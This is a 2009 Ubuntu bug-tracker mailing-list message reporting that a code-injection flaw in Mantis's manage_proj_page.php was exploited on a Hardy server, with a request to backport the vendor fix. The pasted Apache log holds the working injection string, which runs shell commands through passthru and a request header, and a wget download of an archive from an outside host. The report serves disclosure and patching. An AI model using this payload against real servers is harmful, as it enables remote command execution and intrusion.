[Bug 345988] Re: security issues with manage_proj_page.php

Christian Schulze Mon, 06 Apr 2009 06:21:11 -0700

This bug has been actively exploited on a hardy machine running mantis 1.0.6 on 
feb 4th 2009, as it was noticed today.
Because of the LTS for hardy the vendor patch should be applied here too.


<APACHE LOG>
IP - - [04/Feb/2009:19:32:48 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 
302 - "-" "-"
IP - - [04/Feb/2009:19:32:49 +0100] "POST /mantis/login.php HTTP/1.0" 302 - "-" 
"-"
IP - - [04/Feb/2009:19:32:50 +0100] "GET 
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3350 "-" "-"
IP - - [04/Feb/2009:19:32:53 +0100] "GET 
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3218 "-" "-"
IP - - [04/Feb/2009:19:33:01 +0100] "GET 
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3605 "-" "-"
IP - - [04/Feb/2009:19:33:19 +0100] "GET 
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3809 "-" "-"
--19:33:01--  http://www.freewebs.com/spaniola/new.tgz
           => `new.tgz'
Resolving www.freewebs.com... 204.2.183.2
Connecting to www.freewebs.com|204.2.183.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 248,497 (243K) [application/x-tar]

    0K .......... .......... .......... .......... .......... 20%   58.65 KB/s
   50K .......... .......... .......... .......... .......... 41%   58.78 KB/s
  100K .......... .......... .......... .......... .......... 61%   51.43 KB/s
  150K .......... .......... .......... .......... .......... 82%   43.37 KB/s
  200K .......... .......... .......... .......... ..        100%   45.68 KB/s

19:33:07 (50.96 KB/s) - `new.tgz' saved [248497/248497]
</APACHE LOG>

The problem seems to be fixed in version 1.1.4.  
Intrepid is shipping 1.1.2.  Has the vendor patch been applied to that version?

-- 
security issues with manage_proj_page.php
https://bugs.launchpad.net/bugs/345988
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 345988] Re: security issues with manage_proj_page.php

Reply via email to